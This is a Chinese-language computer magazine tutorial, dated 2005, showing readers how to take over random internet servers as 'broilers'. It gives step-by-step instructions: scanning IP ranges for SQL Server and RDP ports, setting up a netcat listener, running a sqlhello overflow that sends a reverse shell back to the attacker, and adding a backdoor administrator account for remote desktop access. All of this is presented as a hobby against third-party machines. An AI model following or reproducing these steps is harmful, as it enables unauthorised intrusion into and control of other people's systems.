「肉雞」是這樣獲得的

「肉雞」是這樣獲得的

文/圖溫鵬

現代計算機總第貳貳零期　　[

2005-10-5

]乙個月黑風高的夜晚，筆者端莊文雅地坐在電腦旁前，看著螢幕閃爍出的入侵資訊，時不時地嘴角露出微笑，又成功地抓取了乙隻「肉雞」。

小知識：什麼叫「肉雞」

肉雞是指在網路上，已經被你成功入侵的主機，並且這台機器完全受控於入侵者的任意操作，如同本機操控一樣的直觀順手。但是對於網路「肉雞」的抓取，大家可以利用ipc$特殊共享的漏洞，來遠端建立空連線，並使用上傳、執行的命令，啟用該木馬的服務端，即可使此機「搖身」變為肉雞。

下面筆者為感興趣的朋友演示一下如何獲得「肉雞」，本次入侵進入的主機是裝有sql資料庫程式的伺服器。如果讀者想按筆者的方法去體驗抓雞樂趣，首先需找尋一台裝有該程式的資料庫。找尋方法：隨意挑選一款掃瞄埠軟體，將掃瞄的1433、3389埠勾選上。然後在開始掃瞄所設立的ip段。不一會，提示資訊中所出現的ip，就是裝有sql程式的主機。

● 天羅地網——監聽本機埠資訊

第一步：執行nc工具，單擊「開始」選單，選擇「執行」標籤，會出現「執行」對話方塊。在「開啟」標籤處輸入cmd命令，然後敲擊「回車」鍵。在彈出的命令窗體中，將目錄跳轉到nc軟體所在的位置。

第二步：在命令列處輸入「nc-vv-l-p

1987

」的命令，然後敲擊「回車」鍵，即可實現對本機1987

埠的監聽（圖1）。

小提示：nc軟體裡的-vv引數代表，得到更詳細的輸入監聽內容。-l代表連線埠關閉後，仍然繼續監聽。-p進行監聽本地埠，後跟數字就是所要監聽的埠號。

● 趕兔撞樹——溢位攻擊

「天羅地網」已經布置妥當，就等肉雞來訪。不過守株待兔自然不是聰明之舉，所以需要我們牽引著小白兔來撞樹。這裡筆者編寫了乙個批處理檔案，將sqlhello的溢位命令放置在其中，然後配合該工具的使用，實現溢位攻擊，讓肉雞自投羅網。具體方法如下：

第一步

第二步：右擊解壓出來的1.bat檔案，選擇「編輯」選項，在彈出的記事文本內容處，輸入命令sqlhello 溢位ip位址1433埠本機ip 監聽埠（圖2）。操作完畢後，單擊「檔案」選單，選擇「儲存」選項，然後再將此視窗關閉即可。

小提示：解壓出來的1.bat檔案，是用來執行sqlhello程式溢位的，所以大家可以按著上述批處理檔案中的內容，照貓畫虎地替換想要溢位、反向連線的ip。

第三步：雙擊剛才關閉的1.bat檔案，螢幕頓時閃過執行命令的窗體，可見批處理檔案，指揮sqlhello溢位程式已經開始執行。這時切換到nc命令監聽窗體，你會發現已經獲取了對方的shell（圖3），接下來在此遠端shell平台中，敲入net user wenpeng 123456 /add的命令，將其「wenpeng」使用者名稱新增到遠端主機中。

第四步：然後使用net user administrators wenpeng /add的命令，將其wenpeng這位使用者提公升為遠端管理員，最後使用本機自帶的遠端終端軟體，敲入剛才所提公升、建立的使用者進入，即可遠端**到肉雞桌面（圖4）。

小提示：當入侵者拿到遠端主機的管理員許可權，便可以隨意遠端操控該機器。在肉雞中得到shell是作業系統的最外層，管理著你與作業系統互動、通訊、執行等工作的操作，假設你已經得到了對方的shell，也就代表著你擁有了與對方計算機直接溝通、下達命令的權力。

獲取肉雞就這麼簡單。當然，在實際操作時，還會碰到不同的情況與問題，要戰勝它們就需要知識與經驗的積累了。

「肉雞」是這樣獲得的

北京是這樣的

kali 肉雞的操作

流量是這樣提高的

「肉雞」是這樣獲得的

北京是這樣的

kali 肉雞的操作

流量是這樣提高的

相關推薦